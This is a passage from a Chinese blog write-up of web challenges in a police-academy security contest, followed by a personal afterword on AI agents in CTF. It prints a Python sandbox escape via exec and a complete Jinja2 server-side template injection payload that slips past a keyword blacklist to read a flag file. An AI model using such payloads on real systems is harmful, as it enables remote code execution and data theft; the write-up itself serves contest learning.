class="hljs-string">&#x27;sandbox.html&#x27;</span>, output=output, code=code)<br><br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;sandbox.html&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>看到关键函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@blog_bp.route(<span class="hljs-params"><span class="hljs-string">&#x27;/execute&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sandbox</span>():<br>    <span class="hljs-keyword">if</span> session.get(<span class="hljs-string">&#x27;user&#x27;</span>) != <span class="hljs-string">&#x27;admin&#x27;</span>:<br>        flash(<span class="hljs-string">&quot;npnpnp&quot;</span>)<br>        <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;blog.view&#x27;</span>))<br><br>    output = <span class="hljs-string">&quot;&quot;</span><br>    <span class="hljs-keyword">if</span> request.method == <span class="hljs-string">&#x27;POST&#x27;</span>:<br>        code = request.form.get(<span class="hljs-string">&#x27;code&#x27;</span>) <br>        safe_globals = &#123;<span class="hljs-string">&quot;__builtins__&quot;</span>: &#123;&#125;&#125;<br>        <br>        original_stdout = sys.stdout<br>        sys.stdout = io.StringIO()<br>        <br>        <span class="hljs-keyword">try</span>:<br>            <span class="hljs-built_in">exec</span>(code, safe_globals)<br>            output = sys.stdout.getvalue()<br>        <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>            output = <span class="hljs-string">f&quot;Error: <span class="hljs-subst">&#123;<span class="hljs-built_in">str</span>(e)&#125;</span>&quot;</span><br>        <span class="hljs-keyword">finally</span>:<br>            sys.stdout = original_stdout<br>        <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;sandbox.html&#x27;</span>, output=output, code=code)<br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;sandbox.html&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>暂时是没看到黑名单，只看到一定不能用<code>__builtins__</code></p>
<p>fuzz了一下，发现删掉了好多模块</p>
<p>索性尝试看看有没有popen能用，用迭代器来试试看</p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/8.png" srcset="/img/loading.gif" lazyload></p>
<p>没报错，可以用</p>
<p>于是构造一下payload，这道题由于没有直接的回显，所以说在最后还得绕个弯，将显示的信息一并以报错的形式输出</p>
<p>用assert</p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/9.png" srcset="/img/loading.gif" lazyload></p>
<p>id成功回显，用find找一下flag在哪里，发现在&#x2F;app目录下，直接cat &#x2F;app&#x2F;flag</p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/10.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/11.png" srcset="/img/loading.gif" lazyload>】</p>
<figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dust"><span class="language-xml">flag</span><span class="hljs-template-variable">&#123;python33_master_t0mcatergogogo2333&#125;</span><br></code></pre></td></tr></table></figure>

<h2 id="babyssti-revenge"><a href="#babyssti-revenge" class="headerlink" title="babyssti_revenge"></a>babyssti_revenge</h2><p>整体跟babyssti差不多，先来看看app.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask,render_template_string,request,render_template<br>app=Flask(__name__)<br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span>,methods=[<span class="hljs-string">&#x27;GET&#x27;</span>,<span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>	black_list=[<span class="hljs-string">&#x27;__class__&#x27;</span>,<span class="hljs-string">&#x27;__init__&#x27;</span>,<span class="hljs-string">&#x27;7&#x27;</span>,<span class="hljs-string">&#x27;*&#x27;</span>,<span class="hljs-string">&#x27;import&#x27;</span>,<span class="hljs-string">&#x27;os&#x27;</span>,<span class="hljs-string">&#x27;popen&#x27;</span>,<span class="hljs-string">&#x27;__&#x27;</span>,<span class="hljs-string">&#x27;system&#x27;</span>]<br>	<span class="hljs-keyword">if</span> request.method==<span class="hljs-string">&#x27;POST&#x27;</span>:<br>		name=request.form.get(<span class="hljs-string">&#x27;name&#x27;</span>)<br>		<span class="hljs-keyword">for</span> black <span class="hljs-keyword">in</span> black_list:<br>			<span class="hljs-keyword">if</span> black <span class="hljs-keyword">in</span> name:<br>				<span class="hljs-keyword">return</span> <span class="hljs-string">&quot;waf!&quot;</span><br>		result=render_template_string(name)<br>		<span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;ok&#x27;</span><br>	<span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;index.html&#x27;</span>)<br><span class="hljs-keyword">if</span> __name__==<span class="hljs-string">&#x27;__main__&#x27;</span>:<br>	app.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>,port=<span class="hljs-number">5000</span>)<br></code></pre></td></tr></table></figure>

<p>很简洁易懂，禁用函数<code>[&#39;__class__&#39;,&#39;__init__&#39;,&#39;7&#39;,&#39;*&#39;,&#39;import&#39;,&#39;os&#39;,&#39;popen&#39;,&#39;__&#39;,&#39;system&#39;]</code>，然后</p>
<p>成功的话只回显ok，又得换一个模板了</p>
<p>下面就是ssti盲打（最烦的部分）</p>
<p>先试了一下，2回显200</p>
Infinity回显500

<p>所以可以拿报错来作为标准</p>
<p>用\x5f来绕过_</p>
<p><code>&#123;% set b=... %&#125;</code>，先把 <code>__builtins__</code> 先取出来，存到变量 b</p>
<p><code>lipsum|attr(&#39;\x5f\x5fglobals\x5f\x5f&#39;)</code>等价于 <code>lipsum.__globals__</code></p>
<p><code>|attr(&#39;get&#39;)(&#39;\x5f\x5fbuiltins\x5f\x5f&#39;)</code>从 globals 字典里取出 <code>__builtins__</code></p>
<p><code>b|attr(&#39;get&#39;)(&#39;exec&#39;)</code>从<code> builtins</code> 里取出 exec</p>
<p><code>exec(&#39;from flask &#39; ~ &#39;im&#39; ~ &#39;port after_this_request ...&#39;)</code>动态执行一段 Python 代码，注册 Flask 的响应后置 hook</p>
<p><code>@after_this_request</code>表示当前这个请求处理完视图函数后，还会执行一次我们定义的函数</p>
<p><code>resp.set_data(open(&quot;/flag.txt&quot;).read())</code>把原本的响应正文 ok 改成 flag 内容</p>
<p>return resp返回修改后的响应对象</p>
<p>最后得到payload</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="language-xml">&#123;% set b=(lipsum|attr(&#x27;\x5f\x5fglobals\x5f\x5f&#x27;)|attr(&#x27;get&#x27;)(&#x27;\x5f\x5fbuiltins\x5f\x5f&#x27;)) %&#125;</span><span class="hljs-template-variable">&#123;&#123; <span class="hljs-name">b</span>|attr(<span class="hljs-name">&#x27;<span class="hljs-built_in">get</span>&#x27;</span>)(<span class="hljs-name">&#x27;exec&#x27;</span>)(<span class="hljs-name">&#x27;from flask &#x27;</span> ~ <span class="hljs-string">&#x27;im&#x27;</span> ~ <span class="hljs-string">&#x27;port after_this_request\n@after_this_request\ndef x(resp):\n    resp.set_data(open(&quot;/flag.txt&quot;).read())\n    return resp&#x27;</span>) &#125;&#125;</span><br></code></pre></td></tr></table></figure>

<p>拿到flag</p>
<p><img src="/img/%E6%B5%99%E6%B1%9F%E8%AD%A6%E5%AF%9F%E5%AD%A6%E9%99%A2%E7%AC%AC%E4%B9%9D%E5%B1%8A%E4%BF%A1%E6%81%AF%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/12.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight ceylon"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ceylon">flag&#123;flask<span class="hljs-number">_</span>b<span class="hljs-number">4</span><span class="hljs-meta">by</span><span class="hljs-number">_m</span>aster<span class="hljs-number">_2026</span>&#125;<br></code></pre></td></tr></table></figure>

<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>​	好久没写后记了，今天是四校联赛后的第一个24小时，然后但从我个人的感觉来说吧，有种难以表达又或是很“矫情”的说法，随着ai的进步，我们这些只会点基础的CTFer可以说被代替是早晚的事。我时不时的会沉溺于agent，借着它的威风在这莫大的世界中留下一点小小的名声（况且现在还没有）。虽说赛时禁用了agent，但还是总会有那么一群人妄想着凭借从ai那里借过来的一点实例和技巧打翻我们剩下这批老实的人。</p>
<p>​	写这一小篇个人随笔也只是随性发挥，自从入门了渗透挖洞后真的可谓肉眼可见的忙，有一大堆新东西，新套路等着我去学，一大堆人和事要我去处理（这是我最烂的短板，我也不想去做），可以说我也日渐憔悴了，开始有点力不从心，又或是说没有坚守自己的本心？我不知道。我只知道，自从今年2月份打完vnctf和破阵阁ctf并且见识到agent的实力后我开始有点随波逐流的味道了，“到了未来，我们这些ctfer是不是得依赖上ai了？为了去抢那些所谓的一，二血而争得个头破血流”，我时常会这样想，要不我以后也去试试研究agent呢，现在肯定还差远了。</p>
<p>​	写到这也差不多了，愿我们的初心用不被践踏，不会偏离正轨，也希望我的人际关系能处理得更融洽吧（（（</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%97%A5%E5%B8%B8%E5%88%B7%E9%A2%98-%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" class="category-chain-item">-日常刷题 -学习笔记</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/wp/" class="print-no-link">#-wp</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>浙江警察学院第九届信息网络安全竞赛-web全解wp</div>
      <div>https://azumisaki.github.io/2026/06/07/浙江警察学院第九届信息网络安全竞赛/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>AzumiSaki</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年6月7日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/06/01/0xgame2025/" title="0xgame2025-Week3 Web全解复现">
                        <span class="hidden-mobile">0xgame2025-Week3 Web全解复现</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start -->
  <div id="corner-cat" aria-hidden="true">
    <div class="cat-svg-wrap">
      <svg class="cat-svg" viewBox="0 0 140 90" xmlns="http://www.w3.org/2000/svg">
        <g class="cat-tail">
          <path d="M112 54 C128 42, 132 30, 122 18 C136 24, 138 42, 126 56"
                fill="none" stroke="currentColor" stroke-width="6" stroke-linecap="round"/>
        </g>

        <g class="cat-body-main">
          <ellipse cx="72" cy="52" rx="34" ry="22" fill="currentColor" opacity="0.16"/>
          <ellipse cx="70" cy="48" rx="30" ry="20" fill="currentColor"/>
          <circle cx="42" cy="42" r="16" fill="currentColor"/>

          <path d="M31 31 L36 18 L43 31 Z" fill="currentColor"/>
          <path d="M41 31 L48 18 L52 32 Z" fill="currentColor"/>

          <path d="M35 42 h4" class="cat-eye left-eye"/>
          <path d="M45 42 h4" class="cat-eye right-eye"/>

          <circle cx="41.5" cy="46.5" r="1.2" fill="#f6c2d8"/>
          <path d="M39 49 Q41.5 51 44 49" class="cat-mouth"/>

          <path d="M28 46 h-10" class="cat-whisker"/>
          <path d="M28 49 h-9" class="cat-whisker"/>
          <path d="M55 46 h10" class="cat-whisker"/>
          <path d="M55 49 h9" class="cat-whisker"/>

          <g class="cat-legs">
            <path d="M56 63 v12" class="cat-leg"/>
            <path d="M68 65 v12" class="cat-leg"/>
            <path d="M82 65 v12" class="cat-leg"/>
            <path d="M94 63 v12" class="cat-leg"/>
          </g>
        </g>
      </svg>
    </div>
  </div>

  <div class="anime-footer-wrap">
    <div class="anime-footer">
      <div class="footer-line"><span id="runtime"></span></div>
      <div class="footer-line footer-statistics" aria-live="polite">
        <span id="busuanzi_container_site_uv" style="display: none">
          总访客 <strong id="busuanzi_value_site_uv"></strong> 人
        </span>
        <span class="divider footer-statistics-divider" aria-hidden="true" hidden>·</span>
        <span id="busuanzi_container_site_pv" style="display: none">
          总访问 <strong id="busuanzi_value_site_pv"></strong> 次
        </span>
        <span id="visitor-stats-status">访问统计加载中...</span>
      </div>
      <div class="footer-line typing" id="footer-typing"></div>
      <div class="footer-line small">
        © 2026 AzumiSaki · Powered by Hexo & Fluid
      </div>
    </div>
  </div>

  <script src="/js/navbar-hide.js"></script>
  <script src="/js/footer.js"></script>
  <script src="/js/falling.js"></script>
  <script src="/js/corner-cat.js"></script>
  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  <!-- hexo injector body_end end --></body>
</html>
